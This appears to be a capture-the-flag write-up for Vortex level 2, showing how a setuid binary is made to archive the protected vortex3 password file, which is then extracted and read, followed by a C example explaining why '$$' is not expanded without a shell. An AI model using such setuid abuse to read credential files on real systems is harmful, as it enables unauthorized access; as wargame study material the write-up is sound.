Level #2 was very easy, somehow even too easy :*(
At first, I thought the $$ would be expanded to the PID, as is usually the case in a shell. However, this is not the case here; in fact, the filename is taken literally, as there is no shell involved.
The solution is now pretty straightforward.
If we execute /vortex/vortex2, it will be executed with the privileges of vortex3 because of the setuid bit.
Since all it does is create a tar file /tmp/ownership.$$.tar, we let it pack the password file /etc/vortex_pass/vortex3 into its tar, then copy the tar back and extract it.
vortex2@vortex:~$ /vortex/vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
vortex2@vortex:~$ cp -v /tmp/ownership.\$\$.tar .
'/tmp/ownership.$$.tar' -> './ownership.$$.tar'
vortex2@vortex:~$ tar xvf ownership.\$\$.tar
etc/vortex_pass/vortex3
vortex2@vortex:~$ cat etc/vortex_pass/vortex3
64[...snip...]
vortex2@vortex:~$ rm -rf etc/ ownership.\$\$.tar
Please don't forget to clean up in the /home folder, as you don't want to spoil it for other users.
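
The $$ behaviour described above, as an added example that is not part of the original write-up and is not the vortex2 source: the same argument is passed once straight through execv() and once through a shell via popen(). It assumes /bin/echo and /bin/sh exist; the helper names and the use of echo are choices made for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Run /bin/echo (assumed to exist) with `arg` via execv, i.e. with no shell
 * in between, and copy the single line it prints into `out`. */
int echo_via_execv(const char *arg, char *out, size_t n)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        dup2(fds[1], STDOUT_FILENO);            /* child: stdout -> pipe */
        close(fds[0]); close(fds[1]);
        char *argv[] = { "/bin/echo", (char *)arg, NULL };
        execv(argv[0], argv);                   /* argv reaches echo byte for byte */
        _exit(127);                             /* only reached if execv failed */
    }
    close(fds[1]);
    ssize_t len = read(fds[0], out, n - 1);
    close(fds[0]);
    waitpid(pid, NULL, 0);
    if (len < 0) return -1;
    out[len] = '\0';
    out[strcspn(out, "\n")] = '\0';             /* strip trailing newline */
    return 0;
}

/* Same argument, but popen() hands the command line to /bin/sh -c,
 * so the shell gets a chance to expand $$ to its own PID first. */
int echo_via_shell(const char *arg, char *out, size_t n)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "echo %s", arg);
    FILE *p = popen(cmd, "r");
    if (!p) return -1;
    if (!fgets(out, (int)n, p)) out[0] = '\0';
    pclose(p);
    out[strcspn(out, "\n")] = '\0';
    return 0;
}

int main(void)
{
    char a[256], b[256];
    const char *name = "/tmp/ownership.$$.tar"; /* file name from the write-up */
    if (echo_via_execv(name, a, sizeof a) || echo_via_shell(name, b, sizeof b)) return 1;
    printf("execv: %s\nshell: %s\n", a, b);
    return 0;
}
```

The execv line keeps the literal `$$`, which is why the archive lands at one fixed, predictable path in /tmp; the shell line shows the PID substitution the name appears to have been written for.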